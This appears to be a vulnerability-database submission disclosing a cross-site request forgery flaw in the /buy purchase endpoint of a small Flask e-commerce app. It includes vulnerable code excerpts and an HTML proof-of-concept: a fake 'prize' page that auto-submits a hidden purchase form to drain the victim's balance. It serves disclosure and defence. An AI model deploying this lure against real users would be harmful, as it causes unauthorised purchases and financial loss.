| Title | imhamzaazam ecommerceFlask v1.0 CSRF |
|---|
| Description | # CSRF Vulnerability in Forced Purchase (/buy)
## Summary
A **Cross-Site Request Forgery (CSRF)** vulnerability exists in the purchase endpoint `/buy`. The lack of CSRF protection in both the application configuration and endpoint implementation allows attackers to force an authenticated victim to purchase a product, deducting the victim's account balance and creating an order without authorization.
## Vulnerability Details
### Configuration-Level Issue
**File**: `application.py` (Lines 24-31)
```python
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# ❌ No CSRF protection mechanism configured (no Flask-WTF / CSRFProtect)
# ❌ No SESSION_COOKIE_SAMESITE configured on the session cookie
db = SQL("sqlite:///ecommDb.db")
```
Authentication relies solely on the session cookie via `helpers.py`:
```python
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if session.get("user_id") is None: # ❌ cookie-only authorization
return redirect("/login")
return f(*args, **kwargs)
return decorated_function
```
### Endpoint-Level Code Analysis
**File**: `application.py` (Lines 48-72)
```python
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
if request.method == "POST":
product = request.form.get("product")
rows = db.execute("Select * from products where product_name= :name", name=product)
quantity = int(request.form.get("quantity"))
# ❌ No CSRF token validation
# ❌ No Origin/Referer verification
db.execute("Update users set cash = cash - :bought where id = :id",
bought=rows[0]["product_price"], id=session["user_id"]) # ⚠️ deducts balance
db.execute("insert into invoice(...) values (...)") # ⚠️ creates order
db.execute("Update products set product_stock = product_stock - :count where product_name=:name",
name=product, count=quantity)
return redirect(url_for("index"))
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ❌ No origin verification
3. ⚠️ Performs a financial state change (balance deduction + order creation) based only on the session cookie
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>You won a prize!</title>
</head>
<body>
<h2>???? Congratulations! Claim your reward</h2>
<p>Loading your reward...</p>
<form id="csrf-form" action="http://127.0.0.1:5000/buy" method="POST">
<input type="hidden" name="product" value="EXISTING_PRODUCT_NAME">
<input type="hidden" name="quantity" value="1">
</form>
<script>
setTimeout(function() {
document.getElementById('csrf-form').submit();
}, 1000);
</script>
</body>
</html>
```
**Verified result** (local deployment): a cross-site, tokenless `/buy` request was accepted (HTTP 302) and the victim balance dropped from `10000.0` to `9900.0`.
## Impact
**Victim balance theft / forced purchase** - Attackers can force an authenticated user to spend their balance on an arbitrary (attacker-defined) product, causing direct financial loss and fraudulent orders.
---
**CVSS Score**: 6.5 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`
**CWE**: CWE-352 (Cross-Site Request Forgery)
---
**Reported by**: flashzyc
**Date**: 2026-06-07
|
|---|
| Source | ⚠️ https://github.com/imhamzaazam/ecommerceFlask/issues/1 |
|---|
| User | flashzyc (UID 92850) |
|---|
| Submission | 06/07/2026 08:11 (29 days ago) |
|---|
| Moderation | 07/05/2026 20:36 (29 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 376394 [imhamzaazam ecommerceFlask up to cb7d9e24c30a99379651b7493b32048126ef402b cross-site request forgery] |
|---|
| Points | 20 |
|---|